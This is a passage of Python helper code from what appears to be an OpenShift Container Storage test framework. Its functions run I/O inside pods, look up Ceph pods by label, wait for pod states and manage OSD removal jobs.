TEST_FILE pod_obj.exec_cmd_on_pod( command=f'bash -c "let i=0; while true; do echo ' f'{TEXT_CONTENT} >> {FILE}$i; let i++; sleep 0.01; done"', timeout=2400, ) # Once the pod gets deleted, the I/O execution will get terminated. # Hence, catching this exception except CommandFailed as ex: if expect_to_fail: if re.search("code 137", str(ex)) or (re.search("code 143", str(ex))): logger.info("I/O command got terminated as expected") return raise ex thread = Thread(target=exec_run_io_cmd, args=(pod_obj, expect_to_fail, fedora_dc)) thread.start() time.sleep(2) # Checking file existence if fedora_dc: FILE = FEDORA_TEST_FILE else: FILE = TEST_FILE test_file = FILE + "1" # Check I/O started try: for sample in TimeoutSampler( timeout=20, sleep=1, func=check_file_existence, pod_obj=pod_obj, file_path=test_file, ): if sample: break logger.info(f"Waiting for I/O to start inside {pod_obj.name}") except TimeoutExpiredError: logger.error( f"Wait timeout: I/O failed to start inside {pod_obj.name}. " "Collect file list." ) parent_dir = os.path.join(TEST_FILE, os.pardir) pod_obj.exec_cmd_on_pod( command=f"ls -l {os.path.abspath(parent_dir)}", out_yaml_format=False ) raise TimeoutExpiredError(f"I/O failed to start inside {pod_obj.name}") return thread def get_admin_key_from_ceph_tools(): """ Fetches admin key secret from ceph Returns: admin keyring encoded with base64 as a string """ tools_pod = get_ceph_tools_pod() out = tools_pod.exec_ceph_cmd(ceph_cmd="ceph auth get-key client.admin") base64_output = base64.b64encode(out["key"].encode()).decode() return base64_output def run_io_and_verify_mount_point(pod_obj, bs="10M", count="950"): """ Run I/O on mount point Args: pod_obj (Pod): The object of the pod bs (str): Read and write up to bytes at a time count (str): Copy only N input blocks Returns: used_percentage (str): Used percentage on mount point """ pod_obj.exec_cmd_on_pod( command=f"dd if=/dev/urandom of=/var/lib/www/html/dd_a bs={bs} count={count}" ) # Verify data's are written to mount-point mount_point = pod_obj.exec_cmd_on_pod(command="df -kh") mount_point = mount_point.split() used_percentage = mount_point[mount_point.index("/var/lib/www/html") - 1] return used_percentage def get_pods_having_label(label, namespace): """ Fetches pod resources with given label in given namespace Args: label (str): label which pods might have namespace (str): Namespace in which to be looked up Return: list: of pods info """ ocp_pod = OCP(kind=constants.POD, namespace=namespace) pods = ocp_pod.get(selector=label).get("items") return pods def get_deployments_having_label(label, namespace): """ Fetches deployment resources with given label in given namespace Args: label (str): label which deployments might have namespace (str): Namespace in which to be looked up Return: list: deployment OCP instances """ ocp_deployment = OCP(kind=constants.DEPLOYMENT, namespace=namespace) pods = ocp_deployment.get(selector=label).get("items") return pods def get_mds_pods(mds_label=constants.MDS_APP_LABEL, namespace=None): """ Fetches info about mds pods in the cluster Args: mds_label (str): label associated with mds pods (default: defaults.MDS_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : of mds pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] mdss = get_pods_having_label(mds_label, namespace) mds_pods = [Pod(**mds) for mds in mdss] return mds_pods def get_mon_pods(mon_label=constants.MON_APP_LABEL, namespace=None): """ Fetches info about mon pods in the cluster Args: mon_label (str): label associated with mon pods (default: defaults.MON_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : of mon pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] mons = get_pods_having_label(mon_label, namespace) mon_pods = [Pod(**mon) for mon in mons] return mon_pods def get_mgr_pods(mgr_label=constants.MGR_APP_LABEL, namespace=None): """ Fetches info about mgr pods in the cluster Args: mgr_label (str): label associated with mgr pods (default: defaults.MGR_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : of mgr pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] mgrs = get_pods_having_label(mgr_label, namespace) mgr_pods = [Pod(**mgr) for mgr in mgrs] return mgr_pods def get_osd_pods(osd_label=constants.OSD_APP_LABEL, namespace=None): """ Fetches info about osd pods in the cluster Args: osd_label (str): label associated with osd pods (default: defaults.OSD_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : of osd pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] osds = get_pods_having_label(osd_label, namespace) osd_pods = [Pod(**osd) for osd in osds] return osd_pods def get_osd_prepare_pods( osd_prepare_label=constants.OSD_PREPARE_APP_LABEL, namespace=defaults.ROOK_CLUSTER_NAMESPACE, ): """ Fetches info about osd prepare pods in the cluster Args: osd_prepare_label (str): label associated with osd prepare pods (default: constants.OSD_PREPARE_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list: OSD prepare pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] osds = get_pods_having_label(osd_prepare_label, namespace) osd_pods = [Pod(**osd) for osd in osds] return osd_pods def get_osd_deployments(osd_label=constants.OSD_APP_LABEL, namespace=None): """ Fetches info about osd deployments in the cluster Args: osd_label (str): label associated with osd deployments (default: defaults.OSD_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list: OSD deployment OCS instances """ namespace = namespace or config.ENV_DATA["cluster_namespace"] osds = get_deployments_having_label(osd_label, namespace) osd_deployments = [OCS(**osd) for osd in osds] return osd_deployments def get_pod_count(label, namespace=None): namespace = namespace or config.ENV_DATA["cluster_namespace"] pods = get_pods_having_label(label=label, namespace=namespace) return len(pods) def get_cephfsplugin_provisioner_pods( cephfsplugin_provisioner_label=constants.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL, namespace=None, ): """ Fetches info about CSI Cephfs plugin provisioner pods in the cluster Args: cephfsplugin_provisioner_label (str): label associated with cephfs provisioner pods (default: defaults.CSI_CEPHFSPLUGIN_PROVISIONER_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : csi-cephfsplugin-provisioner Pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] pods = get_pods_having_label(cephfsplugin_provisioner_label, namespace) fs_plugin_pods = [Pod(**pod) for pod in pods] return fs_plugin_pods def get_rbdfsplugin_provisioner_pods( rbdplugin_provisioner_label=constants.CSI_RBDPLUGIN_PROVISIONER_LABEL, namespace=None, ): """ Fetches info about CSI Cephfs plugin provisioner pods in the cluster Args: rbdplugin_provisioner_label (str): label associated with RBD provisioner pods (default: defaults.CSI_RBDPLUGIN_PROVISIONER_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : csi-rbdplugin-provisioner Pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] pods = get_pods_having_label(rbdplugin_provisioner_label, namespace) ebd_plugin_pods = [Pod(**pod) for pod in pods] return ebd_plugin_pods def get_pod_obj(name, namespace=None): """ Returns the pod obj for the given pod Args: name (str): Name of the resources Returns: obj : A pod object """ ocp_obj = OCP(api_version="v1", kind=constants.POD, namespace=namespace) ocp_dict = ocp_obj.get(resource_name=name) pod_obj = Pod(**ocp_dict) return pod_obj def get_pod_logs( pod_name, container=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, previous=False ): """ Get logs from a given pod pod_name (str): Name of the pod container (str): Name of the container namespace (str): Namespace of the pod previous (bool): True, if pod previous log required. False otherwise. Returns: str: Output from 'oc get logs <pod_name> command """ pod = OCP(kind=constants.POD, namespace=namespace) cmd = f"logs {pod_name}" if container: cmd += f" -c {container}" if previous: cmd += " --previous" return pod.exec_oc_cmd(cmd, out_yaml_format=False) def get_pod_node(pod_obj): """ Get the node that the pod is running on Args: pod_obj (OCS): The pod object Returns: ocs_ci.ocs.ocp.OCP: The node object """ node_name = pod_obj.get().get("spec").get("nodeName") return node.get_node_objs(node_names=node_name)[0] def delete_pods(pod_objs, wait=True): """ Deletes list of the pod objects Args: pod_objs (list): List of the pod objects to be deleted wait (bool): Determines if the delete command should wait for completion """ for pod in pod_objs: pod.delete(wait=wait) def validate_pods_are_respinned_and_running_state(pod_objs_list): """ Verifies the list of the pods are respinned and in running state Args: pod_objs_list (list): List of the pods obj Returns: bool : True if the pods are respinned and running, False otherwise Raises: ResourceWrongStatusException: In case the resources hasn't reached the Running state """ for pod in pod_objs_list: helpers.wait_for_resource_state(pod, constants.STATUS_RUNNING, timeout=180) for pod in pod_objs_list: pod_obj = pod.get() start_time = pod_obj["status"]["startTime"] ts = time.strptime(start_time, "%Y-%m-%dT%H:%M:%SZ") ts = calendar.timegm(ts) current_time_utc = time.time() sec = current_time_utc - ts if (sec / 3600) >= 1: logger.error( f"Pod {pod.name} is not respinned, the age of the pod is {start_time}" ) return False return True def verify_node_name(pod_obj, node_name): """ Verifies that the pod is running on a particular node Args: pod_obj (Pod): The pod object node_name (str): The name of node to check Returns: bool: True if the pod is running on a particular node, False otherwise """ logger.info( f"Checking whether the pod {pod_obj.name} is running on " f"node {node_name}" ) actual_node = pod_obj.get().get("spec").get("nodeName") if actual_node == node_name: logger.info( f"The pod {pod_obj.name} is running on the specified node " f"{actual_node}" ) return True else: logger.info( f"The pod {pod_obj.name} is not running on the specified node " f"specified node: {node_name}, actual node: {actual_node}" ) return False def get_pvc_name(pod_obj): """ Function to get pvc_name from pod_obj Args: pod_obj (str): The pod object Returns: str: The pvc name of a given pod_obj, Raises: UnavailableResourceException: If no pvc attached """ pvc = pod_obj.get().get("spec").get("volumes")[0].get("persistentVolumeClaim") if not pvc: raise UnavailableResourceException return pvc.get("claimName") def get_used_space_on_mount_point(pod_obj): """ Get the used space on a mount point Args: pod_obj (POD): The pod object Returns: int: Percentage represent the used space on the mount point """ # Verify data's are written to mount-point mount_point = pod_obj.exec_cmd_on_pod(command="df -kh") mount_point = mount_point.split() used_percentage = mount_point[mount_point.index(constants.MOUNT_POINT) - 1] return used_percentage def get_plugin_pods(interface, namespace=None): """ Fetches info of csi-cephfsplugin pods or csi-rbdplugin pods Args: interface (str): Interface type. eg: CephBlockPool, CephFileSystem namespace (str): Name of cluster namespace Returns: list : csi-cephfsplugin pod objects or csi-rbdplugin pod objects """ if interface == constants.CEPHFILESYSTEM: plugin_label = constants.CSI_CEPHFSPLUGIN_LABEL if interface == constants.CEPHBLOCKPOOL: plugin_label = constants.CSI_RBDPLUGIN_LABEL namespace = namespace or config.ENV_DATA["cluster_namespace"] plugins_info = get_pods_having_label(plugin_label, namespace) plugin_pods = [Pod(**plugin) for plugin in plugins_info] return plugin_pods def get_plugin_provisioner_leader(interface, namespace=None, leader_type="provisioner"): """ Get csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod Args: interface (str): Interface type. eg: CephBlockPool, CephFileSystem namespace (str): Name of cluster namespace leader_type (str): Parameter to check the lease. eg: 'snapshotter' to select external-snapshotter leader holder Returns: Pod: csi-cephfsplugin-provisioner or csi-rbdplugin-provisioner leader pod """ namespace = namespace or config.ENV_DATA["cluster_namespace"] leader_types = { "provisioner": namespace, "snapshotter": f"external-snapshotter-leader-{namespace}", "resizer": f"external-resizer-{namespace}", "attacher": f"external-attacher-{namespace}", } if interface == constants.CEPHBLOCKPOOL: lease_cmd = f"get leases {leader_types[leader_type]}-rbd-csi-ceph-com -o yaml" elif interface == constants.CEPHFILESYSTEM: lease_cmd = ( f"get leases {leader_types[leader_type]}-cephfs-csi-ceph-com " "-o yaml" ) ocp_obj = ocp.OCP(kind=constants.POD, namespace=namespace) lease = ocp_obj.exec_oc_cmd(command=lease_cmd) leader = lease.get("spec").get("holderIdentity").strip() assert leader, "Couldn't identify plugin provisioner leader pod." logger.info(f"Plugin provisioner leader pod is {leader}") ocp_obj._resource_name = leader leader_pod = Pod(**ocp_obj.get()) return leader_pod def get_operator_pods(operator_label=constants.OPERATOR_LABEL, namespace=None): """ Fetches info about rook-ceph-operator pods in the cluster Args: operator_label (str): Label associated with rook-ceph-operator pod namespace (str): Namespace in which ceph cluster lives Returns: list : of rook-ceph-operator pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] operators = get_pods_having_label(operator_label, namespace) operator_pods = [Pod(**operator) for operator in operators] return operator_pods def upload(pod_name, localpath, remotepath, namespace=None): """ Upload a file to pod Args: pod_name (str): Name of the pod localpath (str): Local file to upload remotepath (str): Target path on the pod """ namespace = namespace or constants.DEFAULT_NAMESPACE cmd = ( f"oc -n {namespace} cp {os.path.expanduser(localpath)} {pod_name}:{remotepath}" ) run_cmd(cmd) def download_file_from_pod(pod_name, remotepath, localpath, namespace=None): """ Download a file from a pod Args: pod_name (str): Name of the pod remotepath (str): Target path on the pod localpath (str): Local file to upload namespace (str): The namespace of the pod """ namespace = namespace or constants.DEFAULT_NAMESPACE cmd = ( f"oc -n {namespace} cp {pod_name}:{remotepath} {os.path.expanduser(localpath)}" ) run_cmd(cmd) def wait_for_storage_pods(timeout=200): """ Check all OCS pods status, they should be in Running or Completed state Args: timeout (int): Number of seconds to wait for pods to get into correct state """ all_pod_obj = get_all_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE) # Ignoring pods with "app=rook-ceph-detect-version" app label all_pod_obj = [ pod for pod in all_pod_obj if pod.get_labels() and constants.ROOK_CEPH_DETECT_VERSION_LABEL not in pod.get_labels() ] for pod_obj in all_pod_obj: state = constants.STATUS_RUNNING if any(i in pod_obj.name for i in ["-1-deploy", "ocs-deviceset"]): state = constants.STATUS_COMPLETED try: helpers.wait_for_resource_state( resource=pod_obj, state=state, timeout=timeout ) except ResourceWrongStatusException: # 'rook-ceph-crashcollector' on the failed node stucks at # pending state. BZ 1810014 tracks it. # Ignoring 'rook-ceph-crashcollector' pod health check as # WA and deleting its deployment so that the pod # disappears. Will revert this WA once the BZ is fixed if "rook-ceph-crashcollector" in pod_obj.name: ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE) pod_name = pod_obj.name deployment_name = "-".join(pod_name.split("-")[:-2]) command = f"delete deployment {deployment_name}" ocp_obj.exec_oc_cmd(command=command) logger.info(f"Deleted deployment for pod {pod_obj.name}") else: raise def verify_pods_upgraded(old_images, selector, count=1, timeout=720): """ Verify that all pods do not have old image. Args: old_images (set): Set with old images. selector (str): Selector (e.g. app=ocs-osd) count (int): Number of resources for selector. timeout (int): Timeout in seconds to wait for pods to be upgraded. Raises: TimeoutException: If the pods didn't get upgraded till the timeout. """ namespace = config.ENV_DATA["cluster_namespace"] pod = OCP( kind=constants.POD, namespace=namespace, ) info_message = ( f"Waiting for {count} pods with selector: {selector} to be running " f"and upgraded." ) logger.info(info_message) start_time = time.time() selector_label, selector_value = selector.split("=") while True: pod_count = 0 try: pods = get_all_pods(namespace, [selector_value], selector_label) pods_len = len(pods) logger.info(f"Found {pods_len} pod(s) for selector: {selector}") if pods_len != count: logger.warning( f"Number of found pods {pods_len} is not as expected: " f"{count}" ) for pod in pods: verify_images_upgraded(old_images, pod.get()) pod_count += 1 except CommandFailed as ex: logger.warning( f"Failed when getting pods with selector {selector}." f"Error: {ex}" ) except NonUpgradedImagesFoundError as ex: logger.warning(ex) check_timeout_reached(start_time, timeout, info_message) if pods_len != count: logger.error(f"Found pods: {pods_len} but expected: {count}!") elif pod_count == count: return def get_noobaa_pods(noobaa_label=constants.NOOBAA_APP_LABEL, namespace=None): """ Fetches info about noobaa pods in the cluster Args: noobaa_label (str): label associated with osd pods (default: defaults.NOOBAA_APP_LABEL) namespace (str): Namespace in which ceph cluster lives (default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list : of noobaa pod objects """ namespace = namespace or config.ENV_DATA["cluster_namespace"] noobaas = get_pods_having_label(noobaa_label, namespace) noobaa_pods = [Pod(**noobaa) for noobaa in noobaas] return noobaa_pods def wait_for_dc_app_pods_to_reach_running_state( dc_pod_obj, timeout=120, exclude_state=None ): """ Wait for DC app pods to reach running state Args: dc_pod_obj (list): list of dc app pod objects timeout (int): Timeout in seconds to wait for pods to be in Running state. exclude_state (str): A resource state to ignore """ for pod_obj in dc_pod_obj: name = pod_obj.get_labels().get("name") dpod_list = get_all_pods(selector_label=f"name={name}", wait=True) for dpod in dpod_list: if "-1-deploy" not in dpod.name and dpod.status != exclude_state: helpers.wait_for_resource_state( dpod, constants.STATUS_RUNNING, timeout=timeout ) def delete_deploymentconfig_pods(pod_obj): """ Delete a DeploymentConfig pod and all the pods that are controlled by it Args: pod_obj (Pod): Pod object """ dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace) pod_data_list = dc_ocp_obj.get().get("items") if pod_data_list: for pod_data in pod_data_list: if pod_obj.get_labels().get("name") == pod_data.get("metadata").get("name"): dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get("name")) dc_ocp_obj.wait_for_delete( resource_name=pod_obj.get_labels().get("name") ) def wait_for_new_osd_pods_to_come_up(number_of_osd_pods_before): status_options = ["Init:1/4", "Init:2/4", "Init:3/4", "PodInitializing", "Running"] try: for osd_pods in TimeoutSampler(timeout=180, sleep=3, func=get_osd_pods): # Check if the new osd pods has started to come up new_osd_pods = osd_pods[number_of_osd_pods_before:] new_osd_pods_come_up = [ pod.status() in status_options for pod in new_osd_pods ] if any(new_osd_pods_come_up): logging.info("One or more of the new osd pods has started to come up") break except TimeoutExpiredError: logging.warning("None of the new osd pods reached the desired status") def get_pod_restarts_count(namespace=defaults.ROOK_CLUSTER_NAMESPACE): """ Gets the dictionary of pod and its restart count for all the pods in a given namespace Returns: dict: dictionary of pod name and its corresponding restart count """ list_of_pods = get_all_pods(namespace) restart_dict = {} ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace) for p in list_of_pods: # we don't want to compare osd-prepare and canary pods as they get created freshly when an osd need to be added. if ( "rook-ceph-osd-prepare" not in p.name and "rook-ceph-drain-canary" not in p.name ): restart_dict[p.name] = int(ocp_pod_obj.get_resource(p.name, "RESTARTS")) logging.info(f"get_pod_restarts_count: restarts dict = {restart_dict}") return restart_dict def check_pods_in_running_state( namespace=defaults.ROOK_CLUSTER_NAMESPACE, pod_names=None, raise_pod_not_found_error=False, ): """ checks whether all the pods in a given namespace are in Running state or not Args: namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE) pod_names (list): List of the pod names to check. If not provided, it will check all the pods in the given namespace raise_pod_not_found_error (bool): If True, it raises an exception, if one of the pods in the pod names are not found. If False, it ignores the case of pod not found and returns the pod objects of the rest of the pod names. The default value is False Returns: Boolean: True, if all pods in Running state. False, otherwise """ ret_val = True if pod_names: list_of_pods = get_pod_objs(pod_names, raise_pod_not_found_error) else: list_of_pods = get_all_pods(namespace) ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace) for p in list_of_pods: # we don't want to compare osd-prepare and canary pods as they get created freshly when an osd need to be added. if ( "rook-ceph-osd-prepare" not in p.name and "rook-ceph-drain-canary" not in p.name ): status = ocp_pod_obj.get_resource(p.name, "STATUS") if ( ("rook-ceph-osd-prepare" not in p.name) and ("rook-ceph-drain-canary" not in p.name) and ("debug" not in p.name) ): status = ocp_pod_obj.get_resource(p.name, "STATUS") if status not in "Running": logging.error( f"The pod {p.name} is in {status} state. Expected = Running" ) ret_val = False return ret_val def get_running_state_pods(namespace=defaults.ROOK_CLUSTER_NAMESPACE): """ Checks the running state pods in a given namespace. Returns: List: all the pod objects that are in running state only """ list_of_pods = get_all_pods(namespace) ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace) running_pods_object = list() for pod in list_of_pods: status = ocp_pod_obj.get_resource(pod.name, "STATUS") if "Running" in status: running_pods_object.append(pod) return running_pods_object def wait_for_pods_to_be_running( namespace=defaults.ROOK_CLUSTER_NAMESPACE, pod_names=None, raise_pod_not_found_error=False, timeout=200, sleep=10, ): """ Wait for all the pods in a specific namespace to be running. Args: namespace (str): the namespace ot the pods pod_names (list): List of the pod names to check. If not provided, it will check all the pods in the given namespace raise_pod_not_found_error (bool): If True, it raises an exception(in the function 'check_pods_in_running_state'), if one of the pods in the pod names are not found. If False, it ignores the case of pod not found and returns the pod objects of the rest of the pod names. The default value is False timeout (int): time to wait for pods to be running sleep (int): Time in seconds to sleep between attempts Returns: bool: True, if all pods in Running state. False, otherwise """ try: for pods_running in TimeoutSampler( timeout=timeout, sleep=sleep, func=check_pods_in_running_state, namespace=namespace, pod_names=pod_names, raise_pod_not_found_error=raise_pod_not_found_error, ): # Check if all the pods in running state if pods_running: logging.info("All the pods reached status running!") return True except TimeoutExpiredError: logging.warning( f"Not all the pods reached status running " f"after {timeout} seconds" ) return False def list_of_nodes_running_pods(selector, namespace=defaults.ROOK_CLUSTER_NAMESPACE): """ The function returns the list of nodes for the given selector Args: selector (str): The resource selector to search with Returns: list: a list of nodes that runs the given selector pods """ pod_obj_list = get_all_pods(namespace=namespace, selector=[selector]) pods_running_nodes = [get_pod_node(pod) for pod in pod_obj_list] logger.info(f"{selector} running on nodes {pods_running_nodes}") return list(set(pods_running_nodes)) def get_osd_removal_pod_name(osd_id, timeout=60): """ Get the osd removal pod name Args: osd_id (int): The osd's id to get the osd removal pod name timeout (int): The time to wait for getting the osd removal pod name Returns: str: The osd removal pod name """ ocs_version = config.ENV_DATA["ocs_version"] if Version.coerce(ocs_version) == Version.coerce("4.7"): pattern = "ocs-osd-removal-job" elif Version.coerce(ocs_version) == Version.coerce("4.8"): pattern = "ocs-osd-removal-" else: pattern = f"ocs-osd-removal-{osd_id}" try: for osd_removal_pod_names in TimeoutSampler( timeout=timeout, sleep=5, func=get_pod_name_by_pattern, pattern=pattern, ): if osd_removal_pod_names: osd_removal_pod_name = osd_removal_pod_names[0] logging.info(f"Found pod {osd_removal_pod_name}") return osd_removal_pod_name except TimeoutExpiredError: logger.warning(f"Failed to get pod by the pattern {pattern}") return None def check_toleration_on_pods(toleration_key=constants.TOLERATION_KEY): """ Function to check toleration on pods Args: toleration_key (str): The toleration key to check """ pod_objs = get_all_pods( namespace=defaults.ROOK_CLUSTER_NAMESPACE, selector=[constants.TOOL_APP_LABEL], exclude_selector=True, ) flag = False for pod_obj in pod_objs: resource_name = pod_obj.name tolerations = pod_obj.get().get("spec").get("tolerations") for key in tolerations: if key["key"] == toleration_key: flag = True if flag: logger.info(f"The Toleration {toleration_key} exists on {resource_name}") else: logger.error( f"The pod {resource_name} does not have toleration {toleration_key}" ) def run_osd_removal_job(osd_ids=None): """ Run the ocs-osd-removal job Args: osd_ids (list): The osd IDs. Returns: ocs_ci.ocs.resources.ocs.OCS: The ocs-osd-removal job object """ osd_ids_str = ",".join(map(str, osd_ids)) ocp_version = get_ocp_version() if Version.coerce(ocp_version) >= Version.coerce("4.6"): cmd = f"process ocs-osd-removal -p FAILED_OSD_IDS={osd_ids_str} -o yaml" else: cmd = f"process ocs-osd-removal -p FAILED_OSD_ID={osd_ids_str} -o yaml" logger.info(f"Executing OSD removal job on OSD ids: {osd_ids_str}") ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE) osd_removal_job_yaml = ocp_obj.exec_oc_cmd(cmd) # Add the namespace param, so that the ocs-osd-removal job will be created in the correct namespace osd_removal_job_yaml["metadata"]["namespace"] = defaults.ROOK_CLUSTER_NAMESPACE osd_removal_job = OCS(**osd_removal_job_yaml) osd_removal_job.create(do_reload=False) return osd_removal_job def verify_osd_removal_job_completed_successfully(osd_id): """ Verify that the ocs-osd-removal job completed successfully Args: osd_id (str): The osd id Returns: bool: True, if the ocs-osd-removal job completed successfully. False, otherwise """ logger.info("Getting the ocs-osd-removal pod name") osd_removal_pod_name = get_osd_removal_pod_name(osd_id) osd_removal_pod_obj = get_pod_obj( osd_removal_pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE ) timeout = 300 try: is_completed = osd_removal_pod_obj.ocp.wait_for_resource( condition=constants.STATUS_COMPLETED, resource_name=osd_removal_pod_name, sleep=20, timeout=timeout, ) # Don't failed the test yet if the ocs-osd-removal pod job is not completed except TimeoutExpiredError: is_completed = False ocp_pod_obj = OCP(kind=constants.POD, namespace=defaults.ROOK_CLUSTER_NAMESPACE) osd_removal_pod_status = ocp_pod_obj.get_resource_status(osd_removal_pod_name) # Check if 'osd_removal_pod' is in status 'completed' if not is_completed and osd_removal_pod_status != constants.STATUS_COMPLETED: if osd_removal_pod_status != constants.STATUS_RUNNING: logger.info( f"ocs-osd-removal pod job did not reach status '{constants.STATUS_COMPLETED}' " f"or '{constants.STATUS_RUNNING}' after {timeout} seconds" ) return False else: logger.info( f"ocs-osd-removal pod job reached status '{constants.STATUS_RUNNING}'," f" but we were waiting for status '{constants.STATUS_COMPLETED}' " ) new_timeout = 900 logger.info( f"Wait more {new_timeout} seconds for ocs-osd-removal pod job to be completed" ) is_completed = osd_removal_pod_obj.ocp.wait_for_resource( condition=constants.STATUS_COMPLETED, resource_name=osd_removal_pod_name, sleep=30, timeout=new_timeout, ) if not is_completed: logger.info( f"ocs-osd-removal pod job did not complete after {new_timeout} seconds" ) return False # Verify OSD removal from the ocs-osd-removal pod logs logger.info(f"Verifying removal of OSD from {osd_removal_pod_name} pod logs") logs = get_pod_logs(osd_removal_pod_name) pattern = f"purged osd.{osd_id}" if not re.search(pattern, logs): logger.warning( f"Didn't find the removal of OSD from {osd_removal_pod_name} pod logs" ) return False return True def delete_osd_removal_job(osd_id): """ Delete the ocs-osd-removal job. Args: osd_id (str): The osd id Returns: bool: True, if the ocs-osd-removal job deleted successfully. False, otherwise """ ocs_version = config.ENV_DATA["ocs_version"] if Version.coerce(ocs_version) >= Version.coerce("4.7"): job_name = "ocs-osd-removal-job" else: job_name = f"ocs-osd-removal-{osd_id}" osd_removal_job = get_job_obj(job_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE) osd_removal_job.delete() try: osd_removal_job.ocp.wait_for_delete(resource_name=job_name) except TimeoutError: logger.warning(f"{job_name} job did not get deleted successfully") return False return True def get_deployment_name(pod_name): """ Get the deployment of the pod. Args: pod_name (str): The pod's name. Returns: The deployment of the specific pod name """ return "-".join(pod_name.split("-")[:-2]) def get_osd_pod_id(osd_pod): """ Get the osd pod id Args: osd_pod (ocs_ci.ocs.resources.pod.Pod): The osd pod object Returns: str: The osd pod id """ return osd_pod.get().get("metadata").get("labels").get("ceph-osd-id") def get_pods_in_statuses(status_options, namespace=defaults.ROOK_CLUSTER_NAMESPACE): """ Get all the pods in specific statuses Args: status_options (list): The list of the status options. namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE) Returns: list: All the pods that their status in the 'status_options' list. """ pods = get_all_pods(namespace) ocp_pod_obj = OCP(kind=constants.POD, namespace=namespace) pods_in_status_options = list() for p in pods: pod_status = ocp_pod_obj.get_resource_status(p.name) if pod_status in status_options: pods_in_status_options.append(p) return pods_in_status_options def get_pod_ceph_daemon_type(pod_obj): """ Get the ceph daemon type of the pod object Args: pod_obj (Pod): the pod object Returns: str: The pod's ceph daemon type """ return pod_obj.get_labels().get("ceph_daemon_type") def check_pods_after_node_replacement(): """ Check the pods status after the node replacement process. Returns: bool: True if all the pods are running after a specific time. False otherwise. """ are_pods_running = wait_for_pods_to_be_running(timeout=180) if are_pods_running: return True not_ready_statuses = [ constants.STATUS_ERROR, constants.STATUS_PENDING, constants.STATUS_CLBO, constants.STATUS_TERMINATING, ] pods_not_ready = get_pods_in_statuses(status_options=not_ready_statuses) if len(pods_not_ready) == 0: logger.info("All the pods are running") return True if len(pods_not_ready) > 1: logger.warning("More than one pod is not running") return False # if len(pods_not_ready) == 1 pod_not_ready = pods_not_ready[0] pod_daemon_type = get_pod_ceph_daemon_type(pod_not_ready) if pod_daemon_type == constants.MON_DAEMON: logger.info( f"One of the '{pod_daemon_type}' pods is not running, " f"but all the other pods are running" ) timeout = 1500 logger.info( f"waiting another {timeout} seconds for all the pods to be running..." ) are_pods_running = wait_for_pods_to_be_running(timeout=timeout, sleep=30) if are_pods_running: logger.info("All the pods are running") return True else: logger.warning( f"Not all the pods are in a running state after {timeout} seconds" ) return False else: logger.warning(f"One of the '{pod_daemon_type}' pods is not running") return False def get_osd_pods_having_ids(osd_ids): """ Get the osd pods having specific ids Args: osd_ids (list): The list of the osd ids Returns: list: The osd pods having the osd ids """ # Convert it to set to reduce complexity osd_ids_set = set(osd_ids) osd_pods_having_ids = [] osd_pods = get_osd_pods() for osd_pod in osd_pods: if get_osd_pod_id(osd_pod) in osd_ids_set: osd_pods_having_ids.append(osd_pod) return osd_pods_having_ids def get_pod_objs( pod_names, raise_pod_not_found_error=False, namespace=defaults.ROOK_CLUSTER_NAMESPACE, ): """ Get the pod objects of the specified pod names Args: pod_names (list): The list of the pod names to get their pod objects namespace (str): Name of cluster namespace(default: defaults.ROOK_CLUSTER_NAMESPACE) raise_pod_not_found_error (bool): If True, it raises an exception, if one of the pods in the pod names are not found. If False, it ignores the case of pod not found and returns the pod objects of the rest of the pod names. The default value is False Returns: list: The pod objects of the specified pod names Raises: ResourceNotFoundError: If 'raise_pod_not_found_error' is True, and not all the pod names were found """ # Convert it to set to reduce complexity pod_names_set = set(pod_names) pods = get_all_pods(namespace=namespace) pod_objs_found = [p for p in pods if p.name in pod_names_set] if len(pod_names) > len(pod_objs_found): pod_names_found_set = {p.name for p in pod_objs_found} pod_names_not_found = list(pod_names_set - pod_names_found_set) error_message = f"Did not find the following pod names: {pod_names_not_found}" if raise_pod_not_found_error: raise ResourceNotFoundError(error_message) else: logger.info(error_message) return pod_objs_found def wait_for_change_in_pods_statuses( pod_names, current_statuses=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE, timeout=300, sleep=20, ): """ Wait for the pod statuses in a specific namespace to change. Args: pod_names (list): List of the pod names to check if their status changed. namespace (str): the namespace ot the pods current_statuses (list): The current pod statuses. These are the pod statuses to check if 